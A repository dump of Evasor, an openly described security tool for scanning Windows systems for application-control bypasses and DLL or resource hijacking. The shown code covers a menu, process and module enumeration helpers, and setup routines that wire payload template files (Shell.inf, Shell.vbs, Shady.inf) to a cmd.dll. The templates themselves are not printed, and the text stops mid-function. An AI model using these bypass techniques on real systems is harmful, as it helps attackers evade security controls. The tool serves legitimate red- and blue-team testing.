├── .codeclimate.yml
├── .vs
└── Evasor
│ └── v15
│ ├── .suo
│ └── Server
│ └── sqlite3
│ ├── db.lock
│ ├── storage.ide
│ ├── storage.ide-shm
│ └── storage.ide-wal
├── CHANGELOG.md
├── CONTRIBUTING.md
├── Evasor.sln
├── Evasor
├── Evasor.csproj
├── FileUtil.cs
├── Module.cs
├── Native.cs
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Refrence_DLLs_to_be_added to the project
│ ├── Microsoft.Office.Interop.Word.dll
│ ├── Newtonsoft.Json.dll
│ ├── Newtonsoft.Json.xml
│ ├── System.Data.SQLite.dll
│ ├── System.Data.SQLite.xml
│ └── System.Management.Automation.dll
├── Report.cs
├── ScreenCapture.cs
├── bin
│ └── Debug
│ │ ├── DLLs
│ │ ├── Shady.inf
│ │ ├── Shell.cs
│ │ ├── Shell.csproj
│ │ ├── Shell.fsscript
│ │ ├── Shell.hta
│ │ ├── Shell.inf
│ │ ├── Shell.rsp
│ │ ├── Shell.sct
│ │ ├── Shell.txt
│ │ └── Shell.vbs
│ │ ├── Evasor.exe.config
│ │ ├── Evasor.pdb
│ │ ├── REPORT
│ │ └── Evasor-Report.docx
│ │ └── TEMP
│ │ ├── Evasor-0-Report.docx
│ │ ├── Evasor-1-Report.docx
│ │ ├── Evasor-2-Report.docx
│ │ ├── Evasor-3-Report.docx
│ │ ├── Evasor-4-Report.docx
│ │ └── ~$nd0rArk-3-Report.docx
└── obj
│ └── Debug
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── Evasor.csproj.CopyComplete
│ ├── Evasor.csproj.CoreCompileInputs.cache
│ ├── Evasor.csproj.FileListAbsolute.txt
│ ├── Evasor.csprojAssemblyReference.cache
│ ├── Evasor.exe.config
│ ├── Evasor.pdb
│ ├── TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs
│ ├── TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs
│ └── TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs
├── Evasor_WCpOGoPmka.png
├── LICENSE
├── README.md
└── devenv_vTcX5EfWI2.png
/.codeclimate.yml:
--------------------------------------------------------------------------------
1 | # This is our default .CodeClimate.yml, broken out by language. Uncomment the
2 | # sections at the bottom that apply to your project. ACTION comments indicate
3 | # places where config might need to be tweaked.
4 |
5 | version: "2"
6 |
7 | plugins:
8 |
9 | # ---------------
10 | # Cross-language plugins. Should always be on.
11 |
12 | duplication: # Looks for similar and identical code blocks
13 | enabled: true
14 | config:
15 | languages:
16 | go:
17 | java:
18 | javascript:
19 | php:
20 | python:
21 | python_version: 3 # ACTION Comment this out if using Python 2
22 | ruby:
23 | swift:
24 | typescript:
25 |
26 | fixme: # Flags any FIXME, TODO, BUG, XXX, HACK comments so they can be fixed
27 | enabled: true
28 | config:
29 | strings:
30 | - FIXME
31 | - TODO
32 | - HACK
33 | - XXX
34 | - BUG
35 |
36 | # ---------------
37 | # Commonly-used languages - run time is minimal and all of these will work
38 | # whether files of that language are found or not. In general, leave uncommented
39 |
40 | # Markdown
41 | markdownlint:
42 | enabled: true
43 |
44 | # Go
45 | gofmt:
46 | enabled: true
47 | golint:
48 | enabled: true
49 | govet:
50 | enabled: true
51 |
52 | # Ruby
53 | flog:
54 | enabled: true
55 | reek:
56 | enabled: true
57 | rubocop:
58 | enabled: true
59 | channel: rubocop-0-79 # As of March 10, 2020, rubocop 0.80.1 is the latest
60 | # However, it does not work with CodeClimate - throws
61 | # an Invalid JSON error.
62 | # ACTION uncomment bundler-audit below if using Gemfile/Gemfile.lock
63 | # ACTION uncomment brakeman below if using Rails
64 |
65 | # Shell scripts
66 | shellcheck:
67 | enabled: true
68 |
69 | # ---------------
70 | # Other languages - will work with or without language files present. Again,
71 | # runtime is minimal, so OK to leave uncommented.
72 |
73 | # CoffeeScript
74 | coffeelint:
75 | enabled: true
76 |
77 | # CSS
78 | csslint:
79 | enabled: true
80 |
81 | # Groovy
82 | codenarc:
83 | enabled: true
84 |
85 | # Java
86 | pmd:
87 | enabled: true
88 | sonar-java:
89 | enabled: true
90 | config:
91 | sonar.java.source: "7" # ACTION set this to the major version of Java used
92 | # ACTION uncomment checkstyle below if Java code exists in repo
93 |
94 | # Node.js
95 | nodesecurity:
96 | enabled: true
97 | # ACTION uncomment eslint below if JavaScript already exists and .eslintrc
98 | # file exists in repo
99 |
100 | # PHP
101 | phan:
102 | enabled: true
103 | config:
104 | file_extensions: "php"
105 | phpcodesniffer:
106 | enabled: true
107 | config:
108 | file_extensions: "php,inc,lib"
109 | # Using Wordpress standards as our one PHP repo is a Wordpress theme
110 | standards: "PSR1,PSR2,WordPress,WordPress-Core,WordPress-Extra"
111 | phpmd:
112 | enabled: true
113 | config:
114 | file_extensions: "php,inc,lib"
115 | rulesets: "cleancode,codesize,controversial,naming,unusedcode"
116 | sonar-php:
117 | enabled: true
118 |
119 | # Python
120 | bandit:
121 | enabled: true
122 | pep8:
123 | enabled: true
124 | radon:
125 | enabled: true
126 | # config:
127 | # python_version: 2 # ACTION Uncomment these 2 lines if using Python 2
128 | sonar-python:
129 | enabled: true
130 |
131 | # ---------------
132 | # Configuration Required Language specific - these will error and abort the
133 | # codeclimate run if they are turned on and certain files or configuration are
134 | # missing. Should be commented out unless the project already includes the
135 | # necessary files that the linter looks at
136 |
137 | # Ruby - requires presence of Gemfile and Gemfile.lock
138 | # bundler-audit:
139 | # enabled: true
140 |
141 | # Rails - requires detecting a Rails application
142 | # brakeman:
143 | # enabled: true
144 |
145 | # Chef - requires detecting a cookbook
146 | # foodcritic:
147 | # enabled: true
148 |
149 | # Java - might require Java code? Errored when run without
150 | # checkstyle:
151 | # enabled: true
152 |
153 | # JavaScript - requires an eslintrc to be created and added to project
154 | # eslint:
155 | # enabled: true
156 | # channel: "eslint-6"
157 |
158 | # ---------------
159 | # List any files/folders to exclude from checking. Wildcards accepted. Leave
160 | # commented if no files to exclude as an empty array will error
161 | exclude_patterns:
162 | - ".gitignore"
163 |
--------------------------------------------------------------------------------
/.vs/Evasor/v15/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/.suo
--------------------------------------------------------------------------------
/.vs/Evasor/v15/Server/sqlite3/db.lock:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/db.lock
--------------------------------------------------------------------------------
/.vs/Evasor/v15/Server/sqlite3/storage.ide:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/storage.ide
--------------------------------------------------------------------------------
/.vs/Evasor/v15/Server/sqlite3/storage.ide-shm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/storage.ide-shm
--------------------------------------------------------------------------------
/.vs/Evasor/v15/Server/sqlite3/storage.ide-wal:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/storage.ide-wal
--------------------------------------------------------------------------------
/CHANGELOG.md:
--------------------------------------------------------------------------------
1 | # Changelog
2 | All notable changes to this project will be documented in this file.
3 |
4 | The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
5 | and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
6 |
7 | ## [Unreleased]
8 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing
2 |
3 | We are accepting contributions.
4 |
5 | For general contribution and community guidelines, please see the [community repo](https://github.com/cyberark/community).
6 |
7 | ## Table of Contents
8 |
9 | - [Development](#development)
10 | - [Testing](#testing)
11 | - [Releases](#releases)
12 | - [Contributing](#contributing-workflow)
13 |
14 | ## Development
15 |
16 | We recommend to use Visual Studio 2017 and for development.
17 |
18 | ## Testing
19 |
20 | We are currently don't have tests, once it will be ready, it will be updated.
21 |
22 | ## Releases
23 |
24 | Release will be build and checked by the owner of the repostiroy.
25 |
26 | ## Contributing workflow
27 |
28 | 1. [Fork the project](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
29 | 2. [Clone your fork](https://help.github.com/en/github/creating-cloning-and-archiving-repositories/cloning-a-repository)
30 | 3. Make local changes to your fork by editing files
31 | 3. [Commit your changes](https://help.github.com/en/github/managing-files-in-a-repository/adding-a-file-to-a-repository-using-the-command-line)
32 | 4. [Push your local changes to the remote server](https://help.github.com/en/github/using-git/pushing-commits-to-a-remote-repository)
33 | 5. [Create new Pull Request](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request-from-a-fork)
34 |
35 | From here your pull request will be reviewed and once you've responded to all
36 | feedback it will be merged into the project. Congratulations, you're a contributor!
37 |
--------------------------------------------------------------------------------
/Evasor.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.705
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Evasor", "Evasor\Evasor.csproj", "{1C8849EF-AD09-4727-BF81-1F777BD1AEF8}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {B0A7CAC5-C319-4873-AB0C-67D7669758E8}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Evasor/Evasor.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}
8 | Exe
9 | Evasor
10 | Evasor
11 | v4.6.1
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 | False
38 | True
39 | Refrence_DLLs_to_be_added to the project\Microsoft.Office.Interop.Word.dll
40 |
41 |
42 | False
43 | Refrence_DLLs_to_be_added to the project\Newtonsoft.Json.dll
44 |
45 |
46 |
47 |
48 | Refrence_DLLs_to_be_added to the project\System.Data.SQLite.dll
49 |
50 |
51 |
52 |
53 | False
54 | Refrence_DLLs_to_be_added to the project\System.Management.Automation.dll
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
--------------------------------------------------------------------------------
/Evasor/FileUtil.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Runtime.InteropServices;
7 | using System.Diagnostics;
8 | using System;
9 | using System.Collections.Generic;
10 |
11 | namespace Evasor
12 | {
13 | static public class FileUtil
14 | {
15 | [StructLayout(LayoutKind.Sequential)]
16 | struct RM_UNIQUE_PROCESS
17 | {
18 | public int dwProcessId;
19 | public System.Runtime.InteropServices.ComTypes.FILETIME ProcessStartTime;
20 | }
21 |
22 | const int RmRebootReasonNone = 0;
23 | const int CCH_RM_MAX_APP_NAME = 255;
24 | const int CCH_RM_MAX_SVC_NAME = 63;
25 |
26 | enum RM_APP_TYPE
27 | {
28 | RmUnknownApp = 0,
29 | RmMainWindow = 1,
30 | RmOtherWindow = 2,
31 | RmService = 3,
32 | RmExplorer = 4,
33 | RmConsole = 5,
34 | RmCritical = 1000
35 | }
36 |
37 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
38 | struct RM_PROCESS_INFO
39 | {
40 | public RM_UNIQUE_PROCESS Process;
41 |
42 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = CCH_RM_MAX_APP_NAME + 1)]
43 | public string strAppName;
44 |
45 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = CCH_RM_MAX_SVC_NAME + 1)]
46 | public string strServiceShortName;
47 |
48 | public RM_APP_TYPE ApplicationType;
49 | public uint AppStatus;
50 | public uint TSSessionId;
51 | [MarshalAs(UnmanagedType.Bool)]
52 | public bool bRestartable;
53 | }
54 |
55 | [DllImport("rstrtmgr.dll", CharSet = CharSet.Unicode)]
56 | static extern int RmRegisterResources(uint pSessionHandle,
57 | UInt32 nFiles,
58 | string[] rgsFilenames,
59 | UInt32 nApplications,
60 | [In] RM_UNIQUE_PROCESS[] rgApplications,
61 | UInt32 nServices,
62 | string[] rgsServiceNames);
63 |
64 | [DllImport("rstrtmgr.dll", CharSet = CharSet.Auto)]
65 | static extern int RmStartSession(out uint pSessionHandle, int dwSessionFlags, string strSessionKey);
66 |
67 | [DllImport("rstrtmgr.dll")]
68 | static extern int RmEndSession(uint pSessionHandle);
69 |
70 | [DllImport("rstrtmgr.dll")]
71 | static extern int RmGetList(uint dwSessionHandle,
72 | out uint pnProcInfoNeeded,
73 | ref uint pnProcInfo,
74 | [In, Out] RM_PROCESS_INFO[] rgAffectedApps,
75 | ref uint lpdwRebootReasons);
76 |
77 | static public List WhoIsLocking(string path)
78 | {
79 | uint handle;
80 | string key = Guid.NewGuid().ToString();
81 | List processes = new List();
82 |
83 | int res = RmStartSession(out handle, 0, key);
84 | if (res != 0) throw new Exception("Could not begin restart session. Unable to determine file locker.");
85 |
86 | try
87 | {
88 | const int ERROR_MORE_DATA = 234;
89 | uint pnProcInfoNeeded = 0,
90 | pnProcInfo = 0,
91 | lpdwRebootReasons = RmRebootReasonNone;
92 |
93 | string[] resources = new string[] { path }; // Just checking on one resource.
94 |
95 | res = RmRegisterResources(handle, (uint)resources.Length, resources, 0, null, 0, null);
96 |
97 | if (res != 0) throw new Exception("Could not register resource.");
98 |
99 | //Note: there's a race condition here -- the first call to RmGetList() returns
100 | // the total number of process. However, when we call RmGetList() again to get
101 | // the actual processes this number may have increased.
102 | res = RmGetList(handle, out pnProcInfoNeeded, ref pnProcInfo, null, ref lpdwRebootReasons);
103 |
104 | if (res == ERROR_MORE_DATA)
105 | {
106 | // Create an array to store the process results
107 | RM_PROCESS_INFO[] processInfo = new RM_PROCESS_INFO[pnProcInfoNeeded];
108 | pnProcInfo = pnProcInfoNeeded;
109 |
110 | // Get the list
111 | res = RmGetList(handle, out pnProcInfoNeeded, ref pnProcInfo, processInfo, ref lpdwRebootReasons);
112 | if (res == 0)
113 | {
114 | processes = new List((int)pnProcInfo);
115 |
116 | // Enumerate all of the results and add them to the
117 | // list to be returned
118 | for (int i = 0; i < pnProcInfo; i++)
119 | {
120 | try
121 | {
122 | processes.Add(Process.GetProcessById(processInfo[i].Process.dwProcessId));
123 | }
124 | // catch the error -- in case the process is no longer running
125 | catch (ArgumentException) { }
126 | }
127 | }
128 | else throw new Exception("Could not list processes locking resource.");
129 | }
130 | else if (res != 0) throw new Exception("Could not list processes locking resource. Failed to get size of result.");
131 | }
132 | finally
133 | {
134 | RmEndSession(handle);
135 | }
136 |
137 | return processes;
138 | }
139 | }
140 | }
141 |
--------------------------------------------------------------------------------
/Evasor/Module.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
8 | namespace Evasor
9 | {
10 | public class Module
11 | {
12 | public Module(string moduleName, IntPtr baseAddress, uint size)
13 | {
14 | this.ModuleName = moduleName;
15 | this.BaseAddress = baseAddress;
16 | this.Size = size;
17 | }
18 |
19 | public string ModuleName { get; set; }
20 | public IntPtr BaseAddress { get; set; }
21 | public uint Size { get; set; }
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/Evasor/Native.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Runtime.InteropServices;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 |
9 | namespace Evasor
10 | {
11 | public class Native
12 | {
13 | [StructLayout(LayoutKind.Sequential)]
14 | public struct ModuleInformation
15 | {
16 | public IntPtr lpBaseOfDll;
17 | public uint SizeOfImage;
18 | public IntPtr EntryPoint;
19 | }
20 |
21 | internal enum ModuleFilter
22 | {
23 | ListModulesDefault = 0x0,
24 | ListModules32Bit = 0x01,
25 | ListModules64Bit = 0x02,
26 | ListModulesAll = 0x03,
27 | }
28 |
29 | [DllImport("psapi.dll")]
30 | public static extern bool EnumProcessModulesEx(IntPtr hProcess, [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] IntPtr[] lphModule, int cb, [MarshalAs(UnmanagedType.U4)] out int lpcbNeeded, uint dwFilterFlag);
31 |
32 | [DllImport("psapi.dll")]
33 | public static extern uint GetModuleFileNameEx(IntPtr hProcess, IntPtr hModule, [Out] StringBuilder lpBaseName, [In] [MarshalAs(UnmanagedType.U4)] uint nSize);
34 |
35 | [DllImport("psapi.dll", SetLastError = true)]
36 | public static extern bool GetModuleInformation(IntPtr hProcess, IntPtr hModule, out ModuleInformation lpmodinfo, uint cb);
37 |
38 | public List CollectModules(System.Diagnostics.Process process)
39 | {
40 | List collectedModules = new List();
41 |
42 | IntPtr[] modulePointers = new IntPtr[0];
43 | int bytesNeeded = 0;
44 |
45 | // Determine number of modules
46 | if (!Native.EnumProcessModulesEx(process.Handle, modulePointers, 0, out bytesNeeded, (uint)Native.ModuleFilter.ListModulesAll))
47 | {
48 | return collectedModules;
49 | }
50 |
51 | int totalNumberofModules = bytesNeeded / IntPtr.Size;
52 | modulePointers = new IntPtr[totalNumberofModules];
53 |
54 | // Collect modules from the process
55 | if (Native.EnumProcessModulesEx(process.Handle, modulePointers, bytesNeeded, out bytesNeeded, (uint)Native.ModuleFilter.ListModulesAll))
56 | {
57 | for (int index = 0; index < totalNumberofModules; index++)
58 | {
59 | StringBuilder moduleFilePath = new StringBuilder(1024);
60 | Native.GetModuleFileNameEx(process.Handle, modulePointers[index], moduleFilePath, (uint)(moduleFilePath.Capacity));
61 |
62 | string moduleName = Path.GetFileName(moduleFilePath.ToString());
63 | Native.ModuleInformation moduleInformation = new Native.ModuleInformation();
64 | Native.GetModuleInformation(process.Handle, modulePointers[index], out moduleInformation, (uint)(IntPtr.Size * (modulePointers.Length)));
65 |
66 | // Convert to a normalized module and add it to our list
67 | Module module = new Module(moduleName, moduleInformation.lpBaseOfDll, moduleInformation.SizeOfImage);
68 | collectedModules.Add(module);
69 | }
70 | }
71 |
72 | return collectedModules;
73 | }
74 | }
75 | }
76 |
77 |
--------------------------------------------------------------------------------
/Evasor/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.IO;
5 | using System.Linq;
6 | using System.Security.AccessControl;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 | using System.Management;
10 | using System.Management.Automation;
11 | using System.Management.Automation.Host;
12 | using System.Runtime.InteropServices;
13 | using System.Dynamic;
14 | using System.Text.RegularExpressions;
15 | using System.Reflection;
16 | using System.Drawing.Imaging;
17 | using System.Threading;
18 |
19 | namespace Evasor
20 | {
21 | class Program
22 | {
23 | static string PATH_OF_Evasor = Path.GetDirectoryName(Path.GetFullPath(Process.GetCurrentProcess().ProcessName + ".exe"));
24 | static List list_of_potential_executables_that_can_bypass_appControl;
25 | static List list_of_available_executables_to_bypass_appControl;
26 | static List list_of_injectable_process;
27 | static List List_Of_Hijckable_dlls;
28 | static List List_Of_Replaceble_dlls;
29 | static List List_Of_hijackble_resources;
30 | static System.Collections.Specialized.StringCollection log = new System.Collections.Specialized.StringCollection();
31 | static string file_To_Execute = string.Empty;
32 | static string choice = string.Empty;
33 | static string dll = string.Empty;
34 | static string[] sub_Paths;
35 | static List proof_Of_Concepts = new List();
36 | static List proof_Of_Concepts_Pictures = new List();
37 | static List file_ends_and_starts = new List();
38 | static List file_extentions = new List();
39 | static void Main(string[] args)
40 | {
41 | initialze_And_Set_files_content_to_original();
42 | list_of_potential_executables_that_can_bypass_appControl = new List();
43 | list_of_available_executables_to_bypass_appControl = new List();
44 |
45 | while (true)
46 | {
47 | try
48 | {
49 | print_logo();
50 | choice = Console.ReadLine();
51 | switch (choice)
52 | {
53 | case "0":
54 | Help();
55 | break;
56 | case "1":
57 | console_AppControl_Bypass_prints();
58 | break;
59 | case "2":
60 | console_DLL_Hijack_Bypass_prints();
61 | break;
62 | case "3":
63 | console_Resources_Hijack_Bypass_prints();
64 | break;
65 | case "4":
66 | console_save_report_prints();
67 | break;
68 | default:
69 | Console.ForegroundColor = ConsoleColor.Red;
70 | Console.WriteLine("No such option... press (0,1,2,3,4) only");
71 | Console.ForegroundColor = ConsoleColor.Gray;
72 | break;
73 | }
74 | }
75 | catch (Exception ex)
76 | { }
77 | }
78 | }
79 |
80 | private static void print_logo()
81 | {
82 | Console.ForegroundColor = ConsoleColor.White;
83 | Console.WriteLine();
84 | Console.WriteLine(" //////////((((((/ ");
85 | Console.WriteLine(" .///////(///((((((((((((. ");
86 | Console.WriteLine(" //////////( ((((((((((( ");
87 | Console.WriteLine(" ////////(/( /(/ ((((((((((* ");
88 | Console.WriteLine(" ///////(//( ((((((( ((((((((((( ");
89 | Console.WriteLine(" //////////(* ((((((((( *((((((((((( ");
90 | Console.WriteLine(" /////////((((((((((((((( *(((((((((((( ");
91 | Console.WriteLine(" ////(///(( (((((((((* ");
92 | Console.WriteLine(" //(///((( ((((((((((((((((( ((((((((( ");
93 | Console.WriteLine(" ////((((( ((((((((((((((((( ((((((((( ");
94 | Console.WriteLine(" //((((((( ((((((( ((((((( ((((((((( ");
95 | Console.WriteLine(" ((((((((( ((((((( ((((((( ((((((((( ");
96 | Console.WriteLine(" ,(((((((( (((((( (((((( (((((((( ");
97 | Console.WriteLine(" (((((((( (((((((/ /((((((( (((((((( ");
98 | Console.WriteLine(" ((((((( ((((((((((((((((( ((((((( ");
99 | Console.WriteLine(" (((((( (((((( ");
100 | Console.WriteLine(" .(((((( (((((( ");
101 | Console.WriteLine(" ,(((((((((((((((((((((((((((, ");
102 | Console.WriteLine(" ((((((((((((((((((((((( ");
103 | Console.WriteLine(" .((((((((((((((( ");
104 | Console.WriteLine();
105 | Console.WriteLine(" Developed by Arik Kublanov. ");
106 | Console.ForegroundColor = ConsoleColor.Yellow;
107 | Console.WriteLine(" Version 1.0.0 ");
108 | Console.ForegroundColor = ConsoleColor.White;
109 | Console.WriteLine(" This tool called Evasor which developed in CyberArk Labs. ");
110 | Console.WriteLine(" It's free to be use and change by the cyber security Community. ");
111 | Console.WriteLine(" automates scans/implement different techniques to bypass Windows APP CONTROL.");
112 | Console.Write(" This tool suits both ");
113 | Console.ForegroundColor = ConsoleColor.Red;
114 | Console.Write("red ");
115 | Console.ForegroundColor = ConsoleColor.White;
116 | Console.Write("and ");
117 | Console.ForegroundColor = ConsoleColor.Blue;
118 | Console.Write("blue ");
119 | Console.ForegroundColor = ConsoleColor.White;
120 | Console.WriteLine("teams in post-exploitation phase.");
121 | Console.WriteLine("__________________________________________________________________________________________");
122 | Console.BackgroundColor = ConsoleColor.Blue;
123 | Console.ForegroundColor = ConsoleColor.White;
124 | Console.WriteLine("|Evasor Menu: |");
125 | Console.WriteLine("|_________________________________________________________________________________________|");
126 | Console.BackgroundColor = ConsoleColor.Black;
127 | Console.WriteLine("|0.Help. |");
128 | Console.WriteLine("|1.Scan For Executibles That Can Bypass Windows APP CONTROL. |");
129 | Console.WriteLine("|2.Scan for Process vulnerable to DLL hijack, DLL replacement. |");
130 | Console.WriteLine("|3.Scan for resource hijacking files such as: |");
131 | Console.WriteLine("| xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml, |");
132 | Console.WriteLine("| lib,inf,reg,log,htm,hta,sys,rsp |");
133 | Console.WriteLine("|4.Create Report. |");
134 | Console.WriteLine("|_________________________________________________________________________________________|");
135 | }
136 |
137 | private static void initialze_And_Set_files_content_to_original()
138 | {
139 | try
140 | {
141 | file_extentions.Add("exe");
142 | file_extentions.Add("dll");
143 | file_extentions.Add("ps1");
144 | file_extentions.Add("bat");
145 | file_extentions.Add("conf");
146 | file_extentions.Add("xml");
147 | file_extentions.Add("vbs");
148 | file_extentions.Add("cmd");
149 | file_extentions.Add("ini");
150 | file_extentions.Add("js");
151 | file_extentions.Add("json");
152 | file_extentions.Add("msi");
153 | file_extentions.Add("yaml");
154 | file_extentions.Add("lib");
155 | file_extentions.Add("inf");
156 | file_extentions.Add("reg");
157 | file_extentions.Add("log");
158 | file_extentions.Add("htm");
159 | file_extentions.Add("hta");
160 | file_extentions.Add("reg");
161 | file_extentions.Add("sys");
162 | file_extentions.Add("cs");
163 | file_extentions.Add("fsscript");
164 | file_extentions.Add("rsp");
165 | file_extentions.Add("sct");
166 | file_extentions.Add("This program cannot be run in DOS mode");
167 |
168 | foreach (string file in file_extentions)
169 | {
170 | file_ends_and_starts.Add("." + file + "");
171 | //here you can add more endings such as <,',>,},],",,
172 | //like -> file_ends_and_starts.Add("." + file + "<");
173 | }
174 |
175 | file_To_Execute = @"\DLLs\Shell.inf";
176 | dll = @"\DLLs\cmd.dll";
177 | set_File_content_to_original(file_To_Execute, dll);
178 |
179 | file_To_Execute = @"\DLLs\Shell.vbs";
180 | dll = @"\DLLs\minimalist.xml";
181 | set_File_content_to_original(file_To_Execute, dll);
182 |
183 | file_To_Execute = @"\DLLs\Shell.fsscript";
184 | dll = @"\DLLs\cmd.dll";
185 | set_File_content_to_original(file_To_Execute, dll);
186 |
187 | file_To_Execute = @"\DLLs\Shady.inf";
188 | dll = @"\DLLs\minimalist.sct";
189 | set_File_content_to_original(file_To_Execute, dll);
190 |
191 | file_To_Execute = @"\DLLs\Shell.rsp";
192 | dll = @"\DLLs\cmd.dll";
193 | set_File_content_to_original(file_To_Execute, dll);
194 | }
195 | catch(Exception ex)
196 | { }
197 | }
198 |
199 | private static void console_save_report_prints()
200 | {
201 | try
202 | {
203 | string[] filePaths = Directory.GetFiles(PATH_OF_Evasor + @"\TEMP\");
204 | string[] documentsToMerge = filePaths;
205 | string outputFileName = (PATH_OF_Evasor + @"\REPORT\" + Process.GetCurrentProcess().ProcessName + "-Report.docx");
206 | Report.Merge(documentsToMerge, outputFileName, true);
207 | Console.WriteLine(Process.GetCurrentProcess().ProcessName + "-Report.docx created!!!");
208 | Console.ReadLine();
209 | }
210 | catch (Exception ex)
211 | { }
212 | }
213 |
214 | private static void set_File_content_to_original(string i_fileToExecute, string i_dll)
215 | {
216 | string text = File.ReadAllText(PATH_OF_Evasor + i_fileToExecute);
217 | text = text.Replace(PATH_OF_Evasor + i_dll, "xxxxxxxxxxxxxxxx");
218 | File.WriteAllText(PATH_OF_Evasor + i_fileToExecute, text);
219 | }
220 |
221 | private static void set_File_content_before_original(string i_fileToExecute, string i_dll)
222 | {
223 | string text = File.ReadAllText(PATH_OF_Evasor + i_fileToExecute);
224 | text = text.Replace("xxxxxxxxxxxxxxxx", PATH_OF_Evasor + i_dll);
225 | File.WriteAllText(PATH_OF_Evasor + i_fileToExecute, text);
226 | }
227 |
228 | private static void Scan_for_resource_hijacking()
229 | {
230 | Console.ForegroundColor = ConsoleColor.Cyan;
231 | Console.WriteLine("______________________________________________________________________________________________________________________________");
232 | Console.WriteLine("|Scan for resource hijacking files (xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml,lib,inf,reg,log,htm,hta,sys).|");
233 | Console.WriteLine("|____________________________________________________________________________________________________________________________|");
234 | Console.ForegroundColor = ConsoleColor.Gray;
235 | Console.ForegroundColor = ConsoleColor.Yellow;
236 | Console.WriteLine("Please wait while scanning the entire disk... It can take a while :(");
237 | Console.ForegroundColor = ConsoleColor.Gray;
238 |
239 | // Start with drives if you have to search the entire computer.
240 | string[] drives = System.Environment.GetLogicalDrives();
241 |
242 | foreach (string dr in drives)
243 | {
244 | System.IO.DriveInfo di = new System.IO.DriveInfo(dr);
245 |
246 | // Here we skip the drive if it is not ready to be read. This
247 | // is not necessarily the appropriate action in all scenarios.
248 | if (!di.IsReady)
249 | {
250 | Console.WriteLine("The drive {0} could not be read", di.Name);
251 | continue;
252 | }
253 | System.IO.DirectoryInfo rootDir = di.RootDirectory;
254 | WalkDirectoryTree(rootDir);
255 | }
256 |
257 | // Write out all the files that could not be processed.
258 | Console.WriteLine("Files with restricted access:");
259 | Console.ForegroundColor = ConsoleColor.Yellow;
